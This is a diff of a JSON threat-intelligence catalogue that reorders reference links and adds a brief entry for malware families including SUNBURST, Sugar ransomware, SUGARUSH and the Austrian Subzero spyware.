- "https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html",
- "https://cdn.netzpolitik.org/wp-upload/2021/12/2018-08-28_DSIRF_Company-Profile-Gov.redacted.pdf",
+ "https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich/",
 "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
- "https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich/"
+ "https://cdn.netzpolitik.org/wp-upload/2021/12/2018-08-28_DSIRF_Company-Profile-Gov.redacted.pdf",
+ "https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html"
 ],
 "synonyms": [
 "Corelump",
@@ -45857,9 +48007,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sugar",
+ "https://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb",
 "https://cyware.com/news/newly-found-sugar-ransomware-is-now-being-offered-as-raas-641cfa69",
- "https://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49",
- "https://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb"
+ "https://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49"
 ],
 "synonyms": [],
 "type": []
@@ -45893,185 +48043,199 @@ "uuid": "129163aa-8539-40ee-a627-0ac6775697b5", "value": "SUGARRUSH" }, + { + "description": "According to Mandiant, SUGARUSH is a backdoor written to establish a connection with an embedded C2 and to execute CMD commands.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sugarush", + "https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping" + ], + "synonyms": [], + "type": [] + }, + "uuid": "129163aa-8539-40ee-a627-0ac6775697b5", + "value": "SUGARUSH" + }, { "description": "FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. 
Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst", - "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection", - "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/", - "https://www.brighttalk.com/webcast/7451/462719", - "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q", + "https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack", + "https://www.fireeye.com/current-threats/sunburst-malware.html", + "https://twitter.com/ItsReallyNick/status/1338382939835478016", + "https://github.com/RedDrip7/SunBurst_DGA_Decode", + "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://securelist.com/sunburst-backdoor-kazuar/99981/", + "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", + "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/", + "https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks", + "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/", + "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance", + "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/", + "https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/", + "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", + "https://www.youtube.com/watch?v=LA-XE5Jy2kU", 
"https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/", "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q", - "https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html", - "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", - "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html", - "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/", - "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/", - "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/", - "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#", - "https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks", + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", "https://netresec.com/?b=211cd21", - "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/", - "https://twitter.com/cybercdh/status/1338975171093336067", - "https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack", - "https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html", - "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/", + "https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm", + "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", + "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution", + "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html", 
"https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf", - "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/", - "https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities", + "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/", + "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software", + "https://twitter.com/Intel471Inc/status/1339233255741120513", + "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha", + "https://netresec.com/?b=211f30f", "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs", - "https://github.com/SentineLabs/SolarWinds_Countermeasures", - "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610", - "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident", - "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf", - "https://www.fireeye.com/current-threats/sunburst-malware.html", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/", - "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947", - "https://twitter.com/cybercdh/status/1338885244246765569", - "https://github.com/fireeye/Mandiant-Azure-AD-Investigator", 
"https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", - "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf", - "https://www.cadosecurity.com/post/responding-to-solarigate", - "https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/", - "https://twitter.com/ItsReallyNick/status/1338382939835478016", - "https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware", - "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/", - "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/", - "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a", - "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", - "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/", - "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", - "https://www.youtube.com/watch?v=mbGN1xqy1jY", - "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306", - "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", - "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", - "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure", - "https://www.brighttalk.com/webcast/7451/469525", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/", - "https://www.mimecast.com/incident-report/", - 
"https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/", - "https://github.com/RedDrip7/SunBurst_DGA_Decode", - "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/", + "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", + "https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation", + "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth", + "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/", + "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst", + "https://twitter.com/cybercdh/status/1338885244246765569", + "https://twitter.com/megabeets_/status/1339308801112027138", + "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf", "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f", "https://twitter.com/KimZetter/status/1338305089597964290", - "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/", - "https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims", - "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/", - "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc", - "https://www.youtube.com/watch?v=GfbxHy6xnbA", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/", - "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/", - 
"https://us-cert.cisa.gov/remediating-apt-compromised-networks", + "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#", + "https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware", "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/", - "https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/", - "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling", - "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS", - "https://netresec.com/?b=211f30f", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://www.4hou.com/posts/KzZR", - "https://www.comae.com/posts/sunburst-memory-analysis/", - "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html", - "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/", - "https://www.youtube.com/watch?v=dV2QTLSecpc", - "https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/", - "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/", - "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign", - "https://community.riskiq.com/article/9a515637", - "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", - "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/", - "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html", - "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view", - 
"https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution", - "https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data", - "https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm", - "https://youtu.be/SW8kVkwDOrc?t=24706", - "https://www.mandiant.com/media/10916/download", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds", - "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/", - "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html", - "https://twitter.com/megabeets_/status/1339308801112027138", - "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance", - "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth", - "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", - "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", - "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", - "https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons", - "https://netresec.com/?b=2113a6a", - "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html", - "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate", - "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html", - 
"https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf", - "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", - "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", - "https://github.com/cisagov/CHIRP", - "https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en", + "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection", - "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718", - "https://us-cert.cisa.gov/ncas/alerts/aa21-077a", - "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha", - "https://www.mandiant.com/resources/unc2452-merged-into-apt29", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/", - "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug", - "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-352a", - "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/", - "https://www.youtube.com/watch?v=JoMwrkijTZ8", - "https://netresec.com/?b=212a6ad", - "https://www.youtube.com/watch?v=-Vsgmw2G4Wo", - "https://github.com/sophos-cybersecurity/solarwinds-threathunt", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a", - 
"https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/", - "https://twitter.com/0xrb/status/1339199268146442241", - "https://www.solarwinds.com/securityadvisory/faq", - "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", - "https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf", - "https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/", - "https://github.com/fireeye/sunburst_countermeasures", - "https://www.mimecast.com/blog/important-security-update/", - "https://twitter.com/lordx64/status/1338526166051934213", - "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar", - "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html", - "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", - "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack", - "https://pastebin.com/6EDgCKxd", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", - "https://www.youtube.com/watch?v=LA-XE5Jy2kU", - "https://www.youtube.com/watch?v=cMauHTV-lJg", - "https://youtu.be/Ta_vatZ24Cs?t=59", - "https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json", - "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response", - "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095", - "https://www.cisa.gov/supply-chain-compromise", - 
"https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action", - "https://twitter.com/Intel471Inc/status/1339233255741120513", - "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", - "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection", - "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.solarwinds.com/securityadvisory", - "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/", - "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga", - "https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/", - "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", - "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/", "https://twitter.com/FireEye/status/1339295983583244302", + "https://www.youtube.com/watch?v=JoMwrkijTZ8", + "https://us-cert.cisa.gov/ncas/alerts/aa21-077a", + "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", + "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html", + "https://community.riskiq.com/article/9a515637", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control", + "https://pastebin.com/6EDgCKxd", + 
"https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf",
+ "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/",
+ "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view",
+ "https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/",
+ "https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://www.4hou.com/posts/KzZR",
+ "https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims",
+ "https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/",
+ "https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities",
+ "https://github.com/cisagov/CHIRP",
+ "https://twitter.com/cybercdh/status/1338975171093336067",
+ "https://www.youtube.com/watch?v=mbGN1xqy1jY",
+ "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/",
+ "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf",
+ "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
+ "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
+ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/",
+ "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/",
+ "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/",
+ "https://netresec.com/?b=2113a6a",
+ "https://netresec.com/?b=212a6ad",
+ "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/",
+ "https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons",
+ "https://twitter.com/0xrb/status/1339199268146442241",
+ "https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html",
+ "https://www.youtube.com/watch?v=dV2QTLSecpc",
+ "https://us-cert.cisa.gov/remediating-apt-compromised-networks",
+ "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
+ "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json",
+ "https://www.mimecast.com/incident-report/",
+ "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/",
+ "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095",
+ "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html",
+ "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack",
+ "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data",
+ "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug",
+ "https://www.cadosecurity.com/post/responding-to-solarigate",
+ "https://www.youtube.com/watch?v=GfbxHy6xnbA",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/",
+ "https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf",
+ "https://github.com/SentineLabs/SolarWinds_Countermeasures",
+ "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/",
+ "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
+ "https://www.solarwinds.com/securityadvisory/faq",
+ "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/",
+ "https://www.cisa.gov/supply-chain-compromise",
+ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q",
 "https://twitter.com/cybercdh/status/1339241246024404994",
- "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/",
+ "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf",
+ "https://github.com/fireeye/Mandiant-Azure-AD-Investigator",
+ "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a",
+ "https://www.mandiant.com/media/10916/download",
+ "https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/",
+ "https://youtu.be/Ta_vatZ24Cs?t=59",
+ "https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action",
 "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware",
 "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
- "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst",
- "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
- "https://securelist.com/sunburst-backdoor-kazuar/99981/",
- "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack"
+ "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-352a",
+ "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign",
+ "https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/",
+ "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/",
+ "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
+ "https://www.brighttalk.com/webcast/7451/462719",
+ "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718",
+ "https://www.brighttalk.com/webcast/7451/469525",
+ "https://github.com/fireeye/sunburst_countermeasures",
+ "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/",
+ "https://twitter.com/lordx64/status/1338526166051934213",
+ "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack",
+ "https://youtu.be/SW8kVkwDOrc?t=24706",
+ "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html",
+ "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
+ "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
+ "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
+ "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610",
+ "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling",
+ "https://www.mimecast.com/blog/important-security-update/",
+ "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response",
+ "https://www.comae.com/posts/sunburst-memory-analysis/",
+ "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/",
+ "https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en",
+ "https://www.solarwinds.com/securityadvisory",
+ "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
